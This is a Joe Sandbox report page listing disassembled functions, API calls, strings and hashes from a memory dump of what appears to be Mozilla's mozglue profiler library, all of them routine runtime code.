Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: String$Double$Converter@double_conversion@@$Builder@2@@$Ascii@CreateDtoaExponentialHandleMode@12@Representation@SpecialValues@memcpystrlen
String ID: 0$z
API String ID: 310210123-2584888582
Opcode ID: dc0f949a60604fb757028f9bf955aeda172b40ad9f10a0a9444deadf109931ba
Instruction ID: 3929bc3d94abefc4140fe14aae5a9638c0eb6d9cd24bfcb292f9e00ea9191224
Opcode Fuzzy Hash: dc0f949a60604fb757028f9bf955aeda172b40ad9f10a0a9444deadf109931ba
Instruction Fuzzy Hash: CB4145719097459FC341CF28C080A9BBBF4BFCA344F408A2EF49987691EB30D649CB96

Function 6C6B9420 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 45COMMON

Download Yara Rule

APIs

Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1

getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
__Init_thread_footer.LIBCMT ref: 6C6B949F

Strings

MOZ_BASE_PROFILER_DEBUG_LOGGING, xrefs: 6C6B946B
MOZ_BASE_PROFILER_LOGGING, xrefs: 6C6B947D
MOZ_BASE_PROFILER_VERBOSE_LOGGING, xrefs: 6C6B9459

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: getenv$CriticalSection$EnterInit_thread_footerLeave
String ID: MOZ_BASE_PROFILER_DEBUG_LOGGING$MOZ_BASE_PROFILER_LOGGING$MOZ_BASE_PROFILER_VERBOSE_LOGGING
API String ID: 4042361484-1628757462
Opcode ID: dc48e73154d268757635c9044f6790d0e90ee258c5d7dc5c33bc0948c5cde651
Instruction ID: 07b182b5e4afa8086ebc153f9bf61c2f8978dac79f9d57a71c3fe89f3456b8eb
Opcode Fuzzy Hash: dc48e73154d268757635c9044f6790d0e90ee258c5d7dc5c33bc0948c5cde651
Instruction Fuzzy Hash: 0401F570A001018BD7109B5EE885A8972B79F0632CF040537D96AD6A52D632D86ACE5F

Function 6C67B630 Relevance: 12.1, APIs: 8, Instructions: 128COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(?,?,?,?,6C67B61E,?,?,?,?,?,00000000), ref: 6C67B6AC

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C67B61E,?,?,?,?,?,00000000), ref: 6C67B6D1
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,?,?,?,6C67B61E,?,?,?,?,?,00000000), ref: 6C67B6E3
memcpy.VCRUNTIME140(00000000,?,?,?,?,?,6C67B61E,?,?,?,?,?,00000000), ref: 6C67B70B
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,6C67B61E,?,?,?,?,?,00000000), ref: 6C67B71D
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,6C67B61E), ref: 6C67B73F
moz_xmalloc.MOZGLUE(80000023,?,?,?,6C67B61E,?,?,?,?,?,00000000), ref: 6C67B760
_invalid_parameter_noinfo_noreturn.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,6C67B61E,?,?,?,?,?,00000000), ref: 6C67B79A

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: memcpy$moz_xmalloc$_invalid_parameter_noinfo_noreturnfreemalloc
String ID:
API String ID: 1394714614-0
Opcode ID: 5ed29e447b42a881a1d2443e7a8092b64a74b712b7a978a6286efad30aca30c6
Instruction ID: 53ce78482a4a57e7521ba61a8b677ab095ac145a738ec051cabca08064b0b533
Opcode Fuzzy Hash: 5ed29e447b42a881a1d2443e7a8092b64a74b712b7a978a6286efad30aca30c6
Instruction Fuzzy Hash: 7541C5B2D001159FCB14DF68DC806AFB7B5FF85324F250A2AE825E7780E731A90587E9

Function 6C6EB540 Relevance: 12.1, APIs: 8, Instructions: 93COMMON

Download Yara Rule

APIs

?classic@locale@std@@SAABV12@XZ.MSVCP140 ref: 6C6EB5B9
??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000), ref: 6C6EB5C5
??Bid@locale@std@@QAEIXZ.MSVCP140 ref: 6C6EB5DA
??1_Lockit@std@@QAE@XZ.MSVCP140(00000000), ref: 6C6EB5F4
__Init_thread_footer.LIBCMT ref: 6C6EB605
?_Getcat@?$ctype@D@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,?,00000000), ref: 6C6EB61F
std::_Facet_Register.LIBCPMT ref: 6C6EB631
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6EB655

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Lockit@std@@$??0_??1_?classic@locale@std@@Bid@locale@std@@D@std@@Facet_Getcat@?$ctype@Init_thread_footerRegisterV12@V42@@Vfacet@locale@2@abortstd::_
String ID:
API String ID: 1276798925-0
Opcode ID: 3e88031275a852d068c8585365afcf28ce21800e449f588e6a5f7d6f06d02001
Instruction ID: 585f766e3c33a29d50fcc176319c6e47c5069a7b4a6e1e5e98de5d1b2ce720a8
Opcode Fuzzy Hash: 3e88031275a852d068c8585365afcf28ce21800e449f588e6a5f7d6f06d02001
Instruction Fuzzy Hash: AA317671B012058BCB009F5AD8955AEB7F6FFCA324F140516D51697740DB319806CFAE

Function 6C6B6590 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 342COMMON

Download Yara Rule

APIs

Part of subcall function 6C6AFA80: GetCurrentThreadId.KERNEL32 ref: 6C6AFA8D
Part of subcall function 6C6AFA80: AcquireSRWLockExclusive.KERNEL32(6C6FF448), ref: 6C6AFA99

ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6B6727
?GetOrAddIndex@UniqueJSONStrings@baseprofiler@mozilla@@AAEIABV?$Span@$$CBD$0PPPPPPPP@@3@@Z.MOZGLUE(?,?,?,?,?,?,?,00000001), ref: 6C6B67C8

Part of subcall function 6C6C4290: memcpy.VCRUNTIME140(?,?,6C6D2003,6C6D0AD9,?,6C6D0AD9,00000000,?,6C6D0AD9,?,00000004,?,6C6D1A62,?,6C6D2003,?), ref: 6C6C42C4

Strings

vol, xrefs: 6C6B696C
data, xrefs: 6C6B6593

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentIndex@P@@3@@ReleaseSpan@$$Strings@baseprofiler@mozilla@@ThreadUniquememcpy
String ID: data$vol
API String ID: 511789754-4108645160
Opcode ID: 05350bbe69758dfdd307c49e37c6a4f98aaa55a37e752d1b21e14e5b73b95f1e
Instruction ID: 5279ebdc0b92b58394c631b1f164222eda7dc5bc7feb7ecf4a8a110995ab7906
Opcode Fuzzy Hash: 05350bbe69758dfdd307c49e37c6a4f98aaa55a37e752d1b21e14e5b73b95f1e
Instruction Fuzzy Hash: 38D1E075A093408FD724CF25C841B9EB7E6AFC6308F10492DE59997B90EB31E809CB5A

Function 6C6AD5D0 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 279COMMON

Download Yara Rule

APIs

moz_xmalloc.MOZGLUE(00000001,?,?,?,?,6C67EB57,?,?,?,?,?,?,?,?,?), ref: 6C6AD652
memset.VCRUNTIME140(00000000,00000000,00000001,?,?,?,?,?,6C67EB57,?), ref: 6C6AD660
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C67EB57,?), ref: 6C6AD673
free.MOZGLUE(?), ref: 6C6AD888

Strings

Wgl, xrefs: 6C6AD5D9, 6C6AD63F
|Enabled, xrefs: 6C6AD81E

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$memsetmoz_xmalloc
String ID: Wgl$|Enabled
API String ID: 4142949111-1705841830
Opcode ID: 8895b6f3f7f8d82dee22133deb2cbd0d0e2a34d5cb21c19cffe399aaf78b7526
Instruction ID: abcaccc33ec9d53ed89f0115616f0c513573bf294f33fff4bea896b7a752711b
Opcode Fuzzy Hash: 8895b6f3f7f8d82dee22133deb2cbd0d0e2a34d5cb21c19cffe399aaf78b7526
Instruction Fuzzy Hash: 05A1F4B0A042049FDB14CFA9C4D07EEBBF1AF4A318F14805DD8956B781D731AD46CBA9

Function 6C6C1D00 Relevance: 10.6, APIs: 7, Instructions: 115threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 6C6C1D0F
AcquireSRWLockExclusive.KERNEL32(?,?,6C6C1BE3,?,?,6C6C1D96,00000000), ref: 6C6C1D18
ReleaseSRWLockExclusive.KERNEL32(?,?,6C6C1BE3,?,?,6C6C1D96,00000000), ref: 6C6C1D4C
GetCurrentThreadId.KERNEL32 ref: 6C6C1DB7
AcquireSRWLockExclusive.KERNEL32(?), ref: 6C6C1DC0
ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C6C1DDA

Part of subcall function 6C6C1EF0: GetCurrentThreadId.KERNEL32 ref: 6C6C1F03
Part of subcall function 6C6C1EF0: AcquireSRWLockExclusive.KERNEL32(?,?,?,?,?,6C6C1DF2,00000000,00000000), ref: 6C6C1F0C
Part of subcall function 6C6C1EF0: ReleaseSRWLockExclusive.KERNEL32 ref: 6C6C1F20

moz_xmalloc.MOZGLUE(00000008,00000000,00000000), ref: 6C6C1DF4

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$mallocmoz_xmalloc
String ID:
API String ID: 1880959753-0
Opcode ID: fb8ae0c0e8ff074b35c116d1edfdef48cf9cc4f8d959297c1a9d3556843a01f1
Instruction ID: 87b6f7e6fb8b28c78e7420d25ee5798d46ffcc6e8b47c714924c4dade25a74c3
Opcode Fuzzy Hash: fb8ae0c0e8ff074b35c116d1edfdef48cf9cc4f8d959297c1a9d3556843a01f1
Instruction Fuzzy Hash: C34178B5200704AFCB10DF29D488A56BBF9FF89314F10446EE96A87B41CB31F814CB9A

Function 6C6B84E0 Relevance: 10.6, APIs: 7, Instructions: 79COMMON

Download Yara Rule

APIs

free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B84F3
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B850A
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B851E
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B855B
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B856F
??1UniqueJSONStrings@baseprofiler@mozilla@@QAE@XZ.MOZGLUE(?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B85AC

Part of subcall function 6C6B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B767F
Part of subcall function 6C6B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,6C6B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B7693
Part of subcall function 6C6B7670: free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000,?,?,?,6C6B85B1,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B76A7

free.MOZGLUE(?,?,?,?,?, (pre-xul),0000000A,?,?,?), ref: 6C6B85B2

Part of subcall function 6C695E90: EnterCriticalSection.KERNEL32(-0000000C), ref: 6C695EDB
Part of subcall function 6C695E90: memset.VCRUNTIME140(ewml,000000E5,?), ref: 6C695F27
Part of subcall function 6C695E90: LeaveCriticalSection.KERNEL32(?), ref: 6C695FB2

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: free$CriticalSection$EnterLeaveStrings@baseprofiler@mozilla@@Uniquememset
String ID:
API String ID: 2666944752-0
Opcode ID: 9956e4d29cc473ffc7fa1ed7d9751bc67390ca44a340ad85e89fddfdc68e6e42
Instruction ID: 8a4e4d232d8c695056e70d0e3de8fdaf23a19fc81d7256e76eb7b140880a4fc2
Opcode Fuzzy Hash: 9956e4d29cc473ffc7fa1ed7d9751bc67390ca44a340ad85e89fddfdc68e6e42
Instruction Fuzzy Hash: 1221BC752006029FDB24DF29D888A5AB7B5BF8830CF24082DE55BD3B41DB31F969CB59

Function 6C681640 Relevance: 10.6, APIs: 7, Instructions: 77COMMON

Download Yara Rule

APIs

memset.VCRUNTIME140(?,00000000,00000114), ref: 6C681699
VerSetConditionMask.NTDLL ref: 6C6816CB
VerSetConditionMask.NTDLL ref: 6C6816D7
VerSetConditionMask.NTDLL ref: 6C6816DE
VerSetConditionMask.NTDLL ref: 6C6816E5
VerSetConditionMask.NTDLL ref: 6C6816EC
VerifyVersionInfoW.KERNEL32(?,00000037,00000000), ref: 6C6816F9

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ConditionMask$InfoVerifyVersionmemset
String ID:
API String ID: 375572348-0
Opcode ID: eab12be9c1c8c82e07639d249bcdb30bc0513646250e2f686d844a888715d330
Instruction ID: bb52f72880befa95cbbb2f723d32bed66b2119758655082ef26a27c73976642e
Opcode Fuzzy Hash: eab12be9c1c8c82e07639d249bcdb30bc0513646250e2f686d844a888715d330
Instruction Fuzzy Hash: B52132B07442086FFB106AA59C85FBBB3BCEFC6704F004528F2449B180C6789D44CAAA

Function 6C6BF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6ACBE8: GetCurrentProcess.KERNEL32(?,6C6731A7), ref: 6C6ACBF1
Part of subcall function 6C6ACBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C6731A7), ref: 6C6ACBFA

Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
Part of subcall function 6C6B9420: __Init_thread_footer.LIBCMT ref: 6C6B949F

GetCurrentThreadId.KERNEL32 ref: 6C6BF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C6BF598), ref: 6C6BF621

Part of subcall function 6C6B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6B94EE
Part of subcall function 6C6B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C6B9508

GetCurrentThreadId.KERNEL32 ref: 6C6BF637
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8,?,?,00000000,?,6C6BF598), ref: 6C6BF645
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8,?,?,00000000,?,6C6BF598), ref: 6C6BF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C6BF62A

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: bdfa9f71ff5eb378921d5e39dd45caf21cf0cb58889538bb54ba960c6055560e
Instruction ID: 55c3fc8fefcaeff796e3db57e3e1ab82df45d22dc4f6544100b416d2c0e36d78
Opcode Fuzzy Hash: bdfa9f71ff5eb378921d5e39dd45caf21cf0cb58889538bb54ba960c6055560e
Instruction Fuzzy Hash: 4C11AB79201105ABD7049F59D5889D577BBFF8735CF100015EA1593F51CB71AC22CBAE

Function 6C6D76C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C6D76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C6D7705

Part of subcall function 6C68CA10: malloc.MOZGLUE(?), ref: 6C68CA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C6D7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C6D778F,00000000,00000000,00000000,00000000), ref: 6C6D7731
free.MOZGLUE(00000000), ref: 6C6D7760

Strings

}>kl, xrefs: 6C6D76C4

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>kl
API String ID: 2538299546-1424617688
Opcode ID: cce5bc29132c0adec52b300347baabf272d6e12e4de45e7bfab12099d1fbfaee
Instruction ID: f087fb1551c690d2ce2e199c6a31afd974f3d988da25428b423826ad2d6a30bb
Opcode Fuzzy Hash: cce5bc29132c0adec52b300347baabf272d6e12e4de45e7bfab12099d1fbfaee
Instruction Fuzzy Hash: B511C8B1905215ABE710AF76DC44BAB7EE8FF4A354F05492AF848D7300E771984087E6

Function 6C680EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6AAB89: EnterCriticalSection.KERNEL32(6C6FE370,?,?,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284), ref: 6C6AAB94
Part of subcall function 6C6AAB89: LeaveCriticalSection.KERNEL32(6C6FE370,?,6C6734DE,6C6FF6CC,?,?,?,?,?,?,?,6C673284,?,?,6C6956F6), ref: 6C6AABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C6AD9F0,00000000), ref: 6C680F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C680F3C
__Init_thread_footer.LIBCMT ref: 6C680F50
FreeLibrary.KERNEL32(?,6C6AD9F0,00000000), ref: 6C680F86

Strings

CoInitializeEx, xrefs: 6C680F36
combase.dll, xrefs: 6C680F18

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 79b3bd43daabf1e77b2d9bfbdf14fe15134766d29da63f1b8502874849f218af
Instruction ID: 518d273f8e8a2449a79a0e1f0fcea633e4cf0945182460a677088a4c3411c100
Opcode Fuzzy Hash: 79b3bd43daabf1e77b2d9bfbdf14fe15134766d29da63f1b8502874849f218af
Instruction Fuzzy Hash: EC11C6743072409BDF01CF5AE988A4537F7FB9B325F00862AED2586B40D7329406CE6E

Function 6C6BF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C684A68), ref: 6C6B945E
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C6B9470
Part of subcall function 6C6B9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C6B9482
Part of subcall function 6C6B9420: __Init_thread_footer.LIBCMT ref: 6C6B949F

GetCurrentThreadId.KERNEL32 ref: 6C6BF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C6BF561

Part of subcall function 6C6B94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C6B94EE
Part of subcall function 6C6B94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C6B9508

GetCurrentThreadId.KERNEL32 ref: 6C6BF577
AcquireSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BF585
ReleaseSRWLockExclusive.KERNEL32(6C6FF4B8), ref: 6C6BF5A3

Strings

[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C6BF56A
[I %d/%d] profiler_pause_sampling, xrefs: 6C6BF3A8
[I %d/%d] profiler_resume_sampling, xrefs: 6C6BF499
[I %d/%d] profiler_resume, xrefs: 6C6BF239

Memory Dump Source

Source File: 00000000.00000002.2289896256.000000006C671000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C670000, based on PE: true

Associated: 00000000.00000002.2289873880.000000006C670000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289961189.000000006C6ED000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2289985092.000000006C6FE000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000000.00000002.2290008204.000000006C702000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c670000_file.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: 687b46bf4ad0d60fbf97dd6e567e2e01a5d650596f01ca286131d98661cabb2b
Instruction ID: b60560caeb40cccd978832d551a2d1389d2ab47c8d2abb43e4d590c8d0ae9750
Opcode Fuzzy Hash: 687b46bf4ad0d60fbf97dd6e567e2e01a5d650596f01ca286131d98661cabb2b
Instruction Fuzzy Hash: DAF0547A6002049BEB006F66A88895E77BFFFD729DF000415EA6593702DB754806C77E

Function 6C680E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C680DF8), ref: 6C680E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C680EA1
__Init_thread_footer.LIBCMT ref: 6C680EB5
FreeLibrary.KERNEL32 ref: 6C680EC5

Strings

kernel32.dll, xrefs: 6C680E7D
GetProcessMitigationPolicy, xrefs: 6C680E9B

Memory Dump Source

